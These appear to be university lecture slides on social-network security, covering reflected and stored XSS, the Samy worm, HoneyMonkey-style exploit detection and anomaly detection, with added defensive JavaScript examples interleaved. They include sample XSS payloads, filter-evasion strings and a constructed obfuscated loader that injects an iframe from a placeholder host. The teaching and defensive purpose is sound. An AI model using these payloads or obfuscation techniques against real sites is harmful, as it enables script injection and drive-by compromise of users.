OSN Vulnerabilities & Social HoneyMonkey
November 23, 2009

S. Felix Wu
Computer Science Department
University of California, Davis
http://www.cs.ucdavis.edu/~wu/
http://www.facebook.com/sfelixwu/
wu@cs.ucdavis.edu

ecs289m, Fall 2009

OSN Vulnerabilities
  • Data/Information oriented attacks
    • Privacy, Spyware
  • Control-flow oriented attacks
    • Trick you into executing something unexpected
    • E.g., the Samy worm

[Figure: reflected XSS flow. (1) The victim has a normal, valid session with the target site. (2) A message from the Malicious User to the Victim User (email client) says "CLICK HERE". (3) Following the link sends malicious code to the target site. (4) The site returns the "reflected" code to the victim's browser window. (5) The malicious code runs in the security context of the target site.]

reflected xss - illustrated

email/googleTalk/irc/etc.

From *deAthL0rd420* to jen.innocent@good.com:

Hey Jen, click on this link - itsa soooo good!!!?!

http://www.good.com/logon.jsp?uid="><script>alert('xss')</script>

reflected xss - illustrated

jen.innocent@good.com → www.good.com (HTTP/HTTPS)

GET /logon.jsp?uid="><script>alert('xss')</script> HTTP/1.1
User-Agent: Lynx
Cookie: Session_Cookie: F24EX98H3L3GAW1;

reflected xss - illustrated

www.good.com → jen.innocent@good.com (HTTP/HTTPS)

<html>
<body><form action="logon.jsp">
Logon Name: <input name="uid"
value=""><script>alert('xss')</script>">
</form></body>
</html>

stored xss - the arsenic in the well

attacker submits sticky (persisted) input to the app (e.g., a blog comment or user profile)

did i mention the input contains JS? whoops

later, some random user comes along and views the profile or blog comment

the application displays the comment/profile in the user's browser, and the JS inside it gets executed instead of displayed

stored xss - illustrated

*deAthL0rd420* → www.good.com (HTTP/HTTPS)

POST /setMyProfile.jsp HTTP/1.1
User-Agent: Lynx
Cookie: Session_Cookie: F24EX98H3L3GAW1;

profile=<script>alert('hi')</script>

stored xss - illustrated

www.good.com → 1st person to view attacker's profile, 2nd person to view attacker's profile, ... (HTTP/HTTPS)

<html>
<body>
<div id="profile">This user's profile:
<script>alert('hi')</script>
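The two illustrations above (the reflected logon.jsp form and the stored setMyProfile.jsp profile) share one root cause and one fix: untrusted input reaches an HTML sink without output encoding. The following is an added example, not code from the slides or from any real site: it renders both pages as strings so it runs in Node without a browser, using the payloads shown on the slides. The escapeHtml function, the in-memory profile store and all names are this example's own.

```javascript
// Added example, not code from the slides: the logon form and profile page from
// the reflected/stored XSS illustrations, rendered as strings so this runs in
// Node without a browser. Payloads are the ones shown on the slides; the escape
// function, the in-memory profile store and the names are this example's own.

const REFLECTED_PAYLOAD = '"><script>alert(\'xss\')</script>'; // uid= parameter
const STORED_PAYLOAD = "<script>alert('hi')</script>";         // profile= body

// Escape the five characters that matter in HTML text and in double-quoted
// attribute values. Output encoding at the sink is the fix for both XSS kinds.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Reflected XSS: logon.jsp echoes the uid parameter into a value="" attribute.
function renderLogonVulnerable(uid) {
  return `<form action="logon.jsp">Logon Name: <input name="uid" value="${uid}"></form>`;
}
function renderLogonSafe(uid) {
  return `<form action="logon.jsp">Logon Name: <input name="uid" value="${escapeHtml(uid)}"></form>`;
}

// Stored XSS: setMyProfile.jsp persists the text; every later viewer receives it.
const profileStore = new Map(); // constructed in-memory stand-in for the app database
function setMyProfile(user, profile) { profileStore.set(user, profile); }
function renderProfileVulnerable(user) {
  return `<div id="profile">This user's profile: ${profileStore.get(user) || ''}</div>`;
}
function renderProfileSafe(user) {
  return `<div id="profile">This user's profile: ${escapeHtml(profileStore.get(user) || '')}</div>`;
}

// Crude stand-in for the browser's parser: would a <script> element be created?
function containsScriptTag(html) { return /<script\b[^>]*>/i.test(html); }

function demo() {
  setMyProfile('deAthL0rd420', STORED_PAYLOAD);
  return {
    reflectedVulnerable: containsScriptTag(renderLogonVulnerable(REFLECTED_PAYLOAD)), // true
    reflectedSafe: containsScriptTag(renderLogonSafe(REFLECTED_PAYLOAD)),             // false
    storedVulnerable: containsScriptTag(renderProfileVulnerable('deAthL0rd420')),     // true
    storedSafe: containsScriptTag(renderProfileSafe('deAthL0rd420')),                 // false
  };
}
```

The only difference between the reflected and stored cases here is where the payload waits (the URL vs. the profile store); the sink-side escaping is the same, and it is the sink, not the input filter, that decides whether the browser sees markup or text.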

the story of samy

myspace™ is one giant advertisement banner that has a hidden social networking site inside of it (like an easter egg)

you set up a profile, pics, etc. for other people to see

samy wanted an xss worm in his own profile that made the reader his friend and a new source of the worm

the story of samy

myspace did well at not letting any JS through

samy used 'java\nscript' since 'javascript' was filtered out, String.fromCharCode(34) to generate a double quote, etc.

10 hours - 560 friends; 13 hours - 6,400; 18 hours - 1,000,000; 19 hours - the entire site is down
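The slide's two evasions illustrate why a keyword blocklist fails. As an added example (not code from the slides, and not MySpace's real filter, which is not on the page), the block below builds a naive blocklist of the kind described, runs the slide's two evasions against it, and then against two stricter checks: the same keyword test after whitespace normalization, and a character allowlist. The filter rules, the allowlist and the names are this example's own assumptions.

```javascript
// Added example, not code from the slides or from MySpace: a blocklist filter of
// the kind the Samy story describes, with the two evasions from the slide run
// against it and against two stricter checks. The filter rules, the allowlist
// and the names are this example's own assumptions.

// 1. Naive blocklist: strip the literal keyword "javascript" and any double quote.
function naiveFilter(input) {
  return input.replace(/javascript/gi, '').replace(/"/g, '');
}

// 2. Same keyword check, but applied after removing the whitespace and control
//    characters that browsers of the era tolerated inside "java\nscript".
function normalizedContainsKeyword(input, keyword) {
  return input.replace(/[\s\u0000-\u001f]/g, '').toLowerCase().includes(keyword);
}

// 3. Allowlist: only accept characters a profile text legitimately needs
//    (assumed policy for this example).
function allowlistAccepts(input) {
  return /^[A-Za-z0-9 .,!?'-]*$/.test(input);
}

// For one input, report whether each check would let it through unchanged.
function evaluate(input) {
  return {
    passesNaive: naiveFilter(input) === input,
    passesNormalized: !normalizedContainsKeyword(input, 'javascript'),
    passesAllowlist: allowlistAccepts(input),
  };
}

// The evasions named on the slide, plus a benign control string.
const SAMPLES = {
  splitKeyword: 'java\nscript',             // newline inside the keyword
  charCodeQuote: 'String.fromCharCode(34)', // builds a " at runtime; no " in the input
  benign: 'Hello, world!',
};

function evaluateAll() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) out[name] = evaluate(s);
  return out;
}
```

Normalization catches the split keyword but not the fromCharCode trick, because that input contains nothing on the blocklist: the quote only exists once the script runs. Only the allowlist rejects both, and even an allowlist is a defense in depth next to output encoding at the sink.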

Topics
  • HoneyMonkey: a quick introduction
  • Why it works, and why it won't
  • Four technical areas to worry about

HoneyMonkey

The goal... as I believe...
  • Given a URL, will visiting it as a normal user cause any undesirable outcome?
    • JSRedir-R (GENO/Gumblar)
    • In-session tracing (phishing without emails)
    • Compromised web browsers (& CSS)
    • Or others...

HoneyMonkey
  • Candidate URLs
    • but which ones?
  • Possibly vulnerable platforms
    • different patch levels, using VMware-like virtual machines
  • Policy to detect violations
    • Any status changes regarding new processes, the registry, and unexpected file activity.

Browser vulnerability exploits...

Code obfuscation → URL redirection → Vulnerability exploitation → Malware installation

Code obfuscation...
  • Dynamic code injection - the document.write() function inside a script.
  • Unreadable code - decoded using the unescape() function.
  • Custom decoding routines.
  • Substring replacement using the replace() function.
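To make the four techniques concrete, here is an added example (not code from the slides and not a sample from any real malicious site): a constructed loader that uses all four, plus a small analysis harness of the kind a scanner would run, which matches static indicators and then captures what document.write() would have injected instead of letting it reach a page. The sample, the XOR key, the host name bad.example and the indicator list are this example's own.

```javascript
// Added example, not code from the slides or from any real malicious site: a
// constructed loader that uses all four tricks listed above, and a small
// analysis harness that captures what document.write() would have injected
// instead of letting it reach a page. The sample, the XOR key, the host name
// bad.example and the indicator list are this example's own.

// Constructed obfuscated sample. Decoded, it writes
//   <iframe src="http://bad.example/x.html"></iframe>
const OBFUSCATED_SAMPLE = [
  // custom decoding routine: host name stored as char codes XORed with 7
  "var h=[101,102,99,41,98,127,102,106,119,107,98],d='';",
  "for(var i=0;i<h.length;i++){d+=String.fromCharCode(h[i]^7);}",
  // unreadable code: percent-encoded markup, with '@' standing in for 'a'
  "var s='%3Cifr@me src=%22http://'+d+'/x.html%22%3E%3C/ifr@me%3E';",
  // substring replacement, unescape(), then dynamic injection via document.write()
  "document.write(unescape(s.replace(/@/g,'a')));",
].join('\n');

// Static indicators a scanner can look for before running anything.
const INDICATORS = [
  ['document.write', /document\.write\s*\(/],
  ['unescape', /\bunescape\s*\(/],
  ['fromCharCode', /String\.fromCharCode/],
  ['replace', /\.replace\s*\(/],
];
function matchedIndicators(code) {
  return INDICATORS.filter(([, re]) => re.test(code)).map(([name]) => name);
}

// Dynamic step: run the script with a fake `document` whose write() records
// its argument. NOTE: new Function() is not a sandbox; HoneyMonkey runs the
// real browser in a throwaway VM for exactly that reason. This is acceptable
// only for samples you constructed yourself, as here.
function captureDocumentWrites(code) {
  const writes = [];
  const fakeDocument = { write: s => { writes.push(String(s)); } };
  new Function('document', 'window', code)(fakeDocument, {});
  return writes;
}

// Pull URLs out of the injected markup for the redirection analysis stage.
function extractUrls(html) {
  return html.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

function analyze(code) {
  const writes = captureDocumentWrites(code);
  return {
    indicators: matchedIndicators(code),
    injected: writes,
    urls: writes.flatMap(extractUrls),
  };
}
```

The static indicators alone say only "this looks obfuscated"; the hooked document.write is what recovers the secondary URL that the next stage (URL redirection) needs to follow.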

URL redirection...

Primary URL → Secondary URL

  • Protocol redirection using an HTTP 302 temporary redirect.
  • HTML tags.
  • Script functions, including window.location.replace().
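A redirect analyzer has to recognize all three mechanisms and remember where it has been, since the chain is only meaningful as a sequence. The block below is an added example, not code from the slides: a chain follower that detects an HTTP 302 Location header, an HTML meta refresh, and a script-driven window.location.replace(), and stops on loops. The responses are constructed and served from an in-memory table; the .example host names and the fetch stub are this example's own.

```javascript
// Added example, not code from the slides: a redirect-chain follower that
// recognizes the three mechanisms listed above (HTTP 302 Location header, HTML
// meta refresh, and script-driven window.location.replace()), keeps the chain
// stateful so loops stop, and records every hop. The responses are constructed
// and served from an in-memory table; the .example host names and the fetch
// stub are this example's own.

const RESPONSES = {
  'http://primary.example/index.html':
    { status: 302, headers: { location: 'http://hop1.example/go' }, body: '' },
  'http://hop1.example/go':
    { status: 200, headers: {}, body: '<html><head><meta http-equiv="refresh" content="0;url=http://hop2.example/land"></head></html>' },
  'http://hop2.example/land':
    { status: 200, headers: {}, body: '<script>window.location.replace("http://hop3.example/exploit.php")</script>' },
  'http://hop3.example/exploit.php':
    { status: 200, headers: {}, body: '<html><body>landing page</body></html>' },
  // two pages redirecting to each other, to exercise the loop guard
  'http://loop.example/a': { status: 302, headers: { location: 'http://loop.example/b' }, body: '' },
  'http://loop.example/b': { status: 302, headers: { location: 'http://loop.example/a' }, body: '' },
};
function fetchFake(url) { return RESPONSES[url] || { status: 404, headers: {}, body: '' }; }

// All redirect targets one response can trigger, each tagged with its mechanism.
function extractRedirects(resp) {
  const out = [];
  if ([301, 302, 303, 307, 308].includes(resp.status) && resp.headers.location) {
    out.push({ via: 'http-' + resp.status, url: resp.headers.location });
  }
  const meta = /<meta[^>]+http-equiv=["']?refresh["']?[^>]*content=["'][^"']*?url=([^"'>\s]+)/i.exec(resp.body);
  if (meta) out.push({ via: 'meta-refresh', url: meta[1] });
  const script = /(?:window\.|document\.)?location(?:\.href)?\s*(?:=|\.replace\(|\.assign\()\s*["']([^"']+)["']/gi;
  for (let m; (m = script.exec(resp.body)); ) out.push({ via: 'script', url: m[1] });
  return out;
}

// Follow the first redirect at each hop. `visited` is the state that makes the
// recursive visits stateful: a URL seen twice ends the chain as a loop.
function followChain(fetch, startUrl, maxDepth = 10) {
  const chain = [];
  const visited = new Set();
  let url = startUrl;
  while (url && chain.length < maxDepth) {
    if (visited.has(url)) { chain.push({ url, loop: true }); break; }
    visited.add(url);
    const resp = fetch(url);
    const next = extractRedirects(resp);
    chain.push({ url, status: resp.status, via: next.map(n => n.via), next: next.map(n => n.url) });
    url = next.length ? next[0].url : null;
  }
  return chain;
}
```

Following only the first redirect per hop keeps the example linear; a scanner would branch on every target. The script regex catches the common literal forms only; a redirect whose target is computed at runtime has to be recovered with the hooked-execution approach, not with pattern matching.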

Vulnerability exploitation...
  • Exploitation of multiple browser vulnerabilities.
  • Owing to its popularity, IE is attacked a lot.

Malware installation...
  • Introduce some piece of arbitrary code onto the victim machine in order to achieve a larger attack goal.

HoneyMonkey
  • Automatically detect and analyze a network of websites that exploit browsers.

For Facebook
  • Automated, continuous analysis of a large number of applications
    • Especially those being actively used.

Exploit detection system...
  • Stage 1 - scalable mode, visiting N FB apps.
  • Stage 2 - perform recursive redirect analysis (trying different functions).
  • Stage 3 - re-scan the exploit URLs/apps using fully patched VMs.

Exploit detection
  • Executable files created or modified outside the browser sandbox folders.
  • Processes created.
  • Windows registry entries created or modified.
  • Vulnerability exploited.

What are the issues?

Exploit detection - XML report...
  • Executable files created or modified outside the browser sandbox folders.
  • Processes created.
  • Windows registry entries created or modified.
  • "Known" vulnerability exploited.
  • Redirect-URLs visited.
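The two exploit-detection lists above are a policy over state changes in the honeypot VM. The block below is an added example, not code from the slides: it applies that policy to a before/after snapshot (processes, files, registry) and emits a report in the spirit of the XML report mentioned. The snapshots, paths, process names, registry keys and the XML layout are constructed for this example; collecting real snapshots from a VM is outside this snippet.

```javascript
// Added example, not code from the slides: the violation policy from the
// "Exploit detection" slides applied to a before/after snapshot of a honeypot
// VM. The snapshots, paths, process names, registry keys and the XML layout are
// constructed for this example; a real implementation would collect snapshots
// from the VM with system-level hooks, which is outside this snippet.

const POLICY = {
  // files created or modified here are what a browser legitimately writes
  sandboxDirs: [
    'C:\\Users\\honey\\AppData\\Local\\Temp\\',
    'C:\\Users\\honey\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\',
  ],
  executable: /\.(exe|dll|scr|sys|bat|cmd)$/i,
  // processes expected on the clean VM after visiting a page
  knownProcesses: new Set(['explorer.exe', 'iexplore.exe', 'svchost.exe']),
};

// Snapshot shape: process names, and files / registry values keyed by path.
const BEFORE = {
  processes: ['explorer.exe', 'iexplore.exe', 'svchost.exe'],
  files: { 'C:\\Users\\honey\\AppData\\Local\\Temp\\page[1].htm': 'sha256:aaa' },
  registry: { 'HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page': 'about:blank' },
};
const AFTER = {
  processes: ['explorer.exe', 'iexplore.exe', 'svchost.exe', 'svchost.exe', 'updater.exe'],
  files: {
    'C:\\Users\\honey\\AppData\\Local\\Temp\\page[1].htm': 'sha256:aaa',
    'C:\\Users\\honey\\AppData\\Local\\Temp\\dl.exe': 'sha256:bbb', // inside sandbox: allowed by this policy
    'C:\\Windows\\System32\\drv.dll': 'sha256:ccc',                  // outside: violation
  },
  registry: {
    'HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page': 'about:blank',
    'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\drv': 'rundll32 C:\\Windows\\System32\\drv.dll',
  },
};

function inSandbox(path, policy) {
  return policy.sandboxDirs.some(dir => path.toLowerCase().startsWith(dir.toLowerCase()));
}

// Returns one entry per policy violation found between the two snapshots.
function detectViolations(before, after, policy) {
  const v = [];
  const seen = new Set(before.processes);
  for (const p of new Set(after.processes)) {
    if (!seen.has(p) && !policy.knownProcesses.has(p)) v.push({ type: 'process', detail: p });
  }
  for (const [path, hash] of Object.entries(after.files)) {
    const changed = before.files[path] !== hash; // new or modified
    if (changed && policy.executable.test(path) && !inSandbox(path, policy)) v.push({ type: 'file', detail: path });
  }
  for (const [key, val] of Object.entries(after.registry)) {
    if (before.registry[key] !== val) v.push({ type: 'registry', detail: key });
  }
  return v;
}

// Report in the shape this example chose; the slides' XML layout is not on the page.
function toXmlReport(url, violations) {
  const esc = s => s.replace(/[<>&"]/g, c => ({ '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;' }[c]));
  const items = violations.map(x => `  <violation type="${x.type}">${esc(x.detail)}</violation>`);
  return [`<report url="${esc(url)}" exploit="${violations.length > 0}">`, ...items, '</report>'].join('\n');
}
```

This policy is deliberately signature-free: it never asks which vulnerability fired, only whether the visit changed the machine in a way a page load must not. That is also its blind spot, which the later "what are the issues" slides pick up: a kernel rootkit that hides its process, file and registry footprint leaves nothing for this diff to see.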

What are the issues?
  • "Exploit Detection"
    • Antivirus, Wepawet (usually signature-based)
    • What about zero-days?
    • Maybe mixed scripting (which could be very complicated) and kernel rootkits...
    • Is there any easier way?

How about OSN?
  • How do we know that our social integrity has been altered?
  • How do we know that our profile/photos have been visited or copied?
    • History of access
  • How do we know that part of our profile has been interpreted as an executable script?
    • Pattern of propagation

An idea of an OSN IDS
  • Amount of social resources consumed by a particular FB application
    • The friendship network (trust and reputation) is what is utilized to conduct communication
    • We have an "expected model" for the usage of such resources ~ anomaly detection

Statistic-based ANomaly Detection (SAND)
  • choose a parameter (a random variable, hopefully without any assumption about its probability distribution)
  • record its statistical "long-term" profile
  • check how much, quantitatively, its short-term behavior deviates from its long-term profile
  • set the right threshold on the deviation to raise alarms
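The four SAND steps, and the OSN IDS idea of measuring the social resources an application consumes, come together in the following added example (not code from the slides). The long-term profile is an exponentially decayed mean and variance, the short-term behavior is the mean of a sliding window, and the deviation is their difference in standard-deviation units. The decay factor, window size, threshold, standard-deviation floor, the rule of not learning from alarmed observations, and the sample series (friend requests per hour from one application, then a Samy-like burst) are this example's own choices.

```javascript
// Added example, not code from the slides: the four SAND steps as a small
// detector. The long-term profile is an exponentially decayed mean and
// variance, the short-term behavior is the mean of a sliding window, and the
// deviation is their difference in standard-deviation units. The decay factor,
// window size, threshold, the standard-deviation floor and the sample series
// are this example's own choices.

class SandDetector {
  constructor({ decay = 0.9, window = 3, threshold = 3, minSd = 1 } = {}) {
    this.decay = decay; this.window = window; this.threshold = threshold; this.minSd = minSd;
    this.mean = null; this.variance = 0; // long-term profile
    this.recent = [];                    // short-term window
  }

  // Deviation of the current short-term window from the long-term profile.
  deviation() {
    if (this.mean === null) return 0;
    const shortMean = this.recent.reduce((a, b) => a + b, 0) / this.recent.length;
    // floor on sd: a perfectly flat profile must not make every change look infinite
    const sd = Math.max(Math.sqrt(this.variance), this.minSd);
    return Math.abs(shortMean - this.mean) / sd;
  }

  // Decayed update of the long-term profile (old evidence fades out).
  learn(x) {
    if (this.mean === null) { this.mean = x; return; }
    const d = x - this.mean;
    this.mean = this.decay * this.mean + (1 - this.decay) * x;
    this.variance = this.decay * this.variance + (1 - this.decay) * d * d;
  }

  // Returns {deviation, alarm}. Observations that raise an alarm are not
  // learned, so an attack cannot train itself into the profile (design choice here).
  observe(x) {
    this.recent.push(x);
    if (this.recent.length > this.window) this.recent.shift();
    const deviation = this.deviation();
    const alarm = deviation > this.threshold;
    if (!alarm) this.learn(x);
    return { deviation, alarm };
  }
}

// Constructed series: friend requests per hour generated by one FB application,
// quiet for ten hours, then a Samy-like burst.
const FRIEND_REQUESTS_PER_HOUR = [5, 6, 4, 5, 7, 5, 6, 4, 5, 6, 40, 300, 2500];

function runSand(series, options) {
  const det = new SandDetector(options);
  return series.map((x, t) => ({ t, x, ...det.observe(x) }));
}
```

With these settings the ten quiet hours never exceed a deviation of about 0.5, and the first burst hour (40 requests against a profile near 5) scores above 11, so the alarm fires on the first anomalous hour rather than after the site is already down. Refusing to learn from alarmed samples is what keeps the second and third burst hours alarming too; without it the profile would chase the attack.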

[Figure: SAND pipeline. Raw events feed the long-term profile, which is maintained by update, decay and clean operations under timer control; the short-term behavior is compared against the profile to compute the deviation (plotted on a 0-30 scale); threshold control decides on alarm generation.]

[Figure: SBL-based anomaly detection. Observed system events go into model-based event analysis, which produces analysis reports; selected examples feed Explanation Based Learning, which updates the model used by the SBL-based anomaly detection.]

AND EXPAND
  • Anomaly Detection
    • Detect
    • Analysis and Explanation
    • Application

Challenges
  • It might take a while before we realize the problem.
  • I.e., HoneyMonkey might not work well here.
  • We probably should build an IDS for each FB profile.

What are the issues?
  • "Black List of scanning IP addresses"
    • Facebook identifiers
    • The attacker knows what we, from which sets of IP addresses, are trying to accomplish.
    • There are techniques to detect whether we are using a virtual environment.

What are the issues?
  • "Correlating Infections"
    • "I personally" haven't seen it, but...
    • Two URLs must be visited in sequence
    • Recursive/redirect URL visits must be "stateful"!

What are the issues?
  • "Capturing Human Interactions"
    • It might be hard to pretend to be a real human user, though.

What are the issues?
  • "Choosing the Candidates"
    • This has been a critical issue when handling billions of possible URLs

Six Issues
  • "Exploit Detection"
  • "Black List of scanning IP addresses"
  • "Correlating Infections"
  • "Capturing Human Interactions"
  • "Choosing the Candidates"
  • "Scalability and Parallelism"

Candidate URLs
  • HoneyMonkey's approach
    • The initial bad list (hosts files and well-known spyware holders)
    • Expanding/growing the list via methods such as mutual referencing and redirection.
  • Others:
    • Spam and phishing emails
    • Special hotspot business websites such as pornography, illegal/pirated content sharing (P2P), and advertising sites (or locally intended targets ~ financial and DoD websites).

Candidate URLs
  • What are our objectives?
    • Regular Internet usage versus national security
  • Biased sampling
    • The number of exploit-provider groups is small (~3).
    • This might be due to the sampling strategies (proof?)

Candidate URLs
  • Yet another approach...
    • Keyword-based searching (using Google)
      • That is how we get "infected" anyway!
    • MapReduce
      • URLs/profiles as the keys
      • Links to "known" malicious pages as the value
      • We can quickly identify a large number of bad URLs (assuming that we are Google).

Candidate URLs
  • Yet another approach...
    • Keyword-based searching (using Google)
      • That is how we get "infected" anyway!
    • MapReduce (still biased)
    • Pure keyword-based (frequency of the "keywords" entered by users)
      • Then, proportional to the frequency distribution, sample a number of candidate pages returned from Google.
      • Plus, analyze all other external information.
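The MapReduce sketch (URLs as keys, links to known-bad pages as values) and the earlier HoneyMonkey idea of growing the bad list through mutual referencing and redirection are the same computation run repeatedly. The block below is an added example, not code from the slides: it runs the map and reduce steps over a tiny constructed crawl, ranks candidates, and then expands the bad list one hop per round. The crawl table, the known-bad set and the .example host names are this example's own.

```javascript
// Added example, not code from the slides: the MapReduce idea above run on a
// tiny constructed crawl, followed by the list-expansion idea from the
// HoneyMonkey candidate slide (pages that reference known-bad pages become
// candidates themselves, one hop per round). The crawl table, the known-bad
// set and the .example host names are this example's own.

const KNOWN_BAD = new Set(['http://exploit1.example/', 'http://exploit2.example/']);

// page URL -> outgoing references (hrefs, iframes and redirect targets)
const CRAWL = {
  'http://news.example/': ['http://blog.example/post1', 'http://cdn.example/lib.js'],
  'http://blog.example/post1': ['http://exploit1.example/', 'http://cdn.example/lib.js'],
  'http://blog.example/post2': ['http://cdn.example/lib.js'],
  'http://ads.example/banner': ['http://exploit1.example/', 'http://exploit2.example/'],
  'http://cdn.example/lib.js': [],
};

// map: emit (url, badLink) for every reference into the bad set
function mapPhase(crawl, bad) {
  const pairs = [];
  for (const [url, links] of Object.entries(crawl)) {
    for (const link of links) if (bad.has(link)) pairs.push([url, link]);
  }
  return pairs;
}

// reduce: group by url, collect the distinct bad links per page
function reducePhase(pairs) {
  const grouped = new Map();
  for (const [url, link] of pairs) {
    if (!grouped.has(url)) grouped.set(url, new Set());
    grouped.get(url).add(link);
  }
  return [...grouped].map(([url, links]) => ({ url, badLinks: [...links] }));
}

// Candidate URLs ranked by how many known-bad pages they reference.
function rankCandidates(crawl, bad) {
  return reducePhase(mapPhase(crawl, bad)).sort((a, b) => b.badLinks.length - a.badLinks.length);
}

// Grow the bad list: a page referencing a bad page joins the list (mutual
// referencing / redirection). This is also the sampling bias the slides warn
// about: the list only ever grows around what was already on it.
function expandBadList(crawl, bad, rounds) {
  const grown = new Set(bad);
  for (let r = 0; r < rounds; r++) {
    for (const { url } of rankCandidates(crawl, grown)) grown.add(url);
  }
  return grown;
}
```

Two rounds reach the news page through the blog post, but nothing ever reaches post2 or the CDN script, however many rounds run: a page that is malicious but not linked from the seed neighbourhood is invisible to this method, which is the "still biased" point on the slide.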

OSN Vulnerabilities
  • Browser
  • OSN service provider (e.g., Facebook.com)
    • Information router/firewall
  • OSN applications (e.g., goDaddy.com)

A possible fundamental flaw of Facebook's security design!

Is the application spreading the virus/worm?

Is the application accessing certain private information of yours?

e.g., why should the application look at my wall posts all the time?

OSN Re-Direction Arch.

Proxy Application

Risk: the proxy itself might be malicious and risky!

How to build up the trust?

Proxy Dualism

FAITH (Facebook Application Identifier Translator & Hypervisor)

like NAT (Network Address Translation)

Software Vulnerability
  • Focus on software vulnerabilities
  • Two approaches
    • better software engineering
    • better understanding of vulnerabilities

Practically, around the Internet, we currently have and will still have a large number of legacy software systems around for "quite a while."

Vulnerability vs. Exploit
  • Vulnerability
    • the "weak" points in the software
    • applications or even the kernel itself
    • e.g., "control flow hijack" based on a buffer overflow
  • Exploit
    • the attack code utilizing one or more vulnerabilities

[Figure: anatomy of an exploit packet: IP header | TCP/UDP header | upper-layer payload, where the payload consists of a NOP sled, decryption code, the attack code, and the exploit's overwritten return address.]

Focus on the "primitives" being used in the "Epsilon" phase!

Application-dependent analysis

System state changes

VM Monitoring

[Figure: security solutions inside the guest OS (best view of OS abstractions) collaborate with security solutions in the VM (isolation and hardware extensibility); both sit above the host OS and the hardware.]

Memory Monitor

[Figure: concrete vs. symbolic memory. Concrete view: values (10, 20, ...) flow from Ethernet card memory into physical memory (offsets 0, 1024, 2048) and into register AL; an ADD of 20 and 10 yields 30. Symbolic view: each location carries a label set ({1}, {2}); labels propagate with the data, and the ADD produces the union {1,2}.]

Bezoar

[Figure: a Virtual Machine whose nondeterministic events (network packets) are logged and checkpointed for replay; the Memory Monitor performs detection and raises an attack notification; recovery actions follow, and a malicious network source notification is issued.]

Interface OS-VM
  • OS -> VM:
    • Software interrupt:
      • uses vector number 15, which is reserved (not used) by Intel.
    • Parameters passed in general-purpose registers;
    • Results returned by the VM in general-purpose registers;
  • VM -> OS: exceptions.

OS-VM Communication

[Figure: user space and kernel space of the guest OS on top of the CPU/VM. The OS issues a software interrupt; the VM's OS Request Manager reads the request parameters from, and writes the results to, the general-purpose registers, backed by a shadow memory.]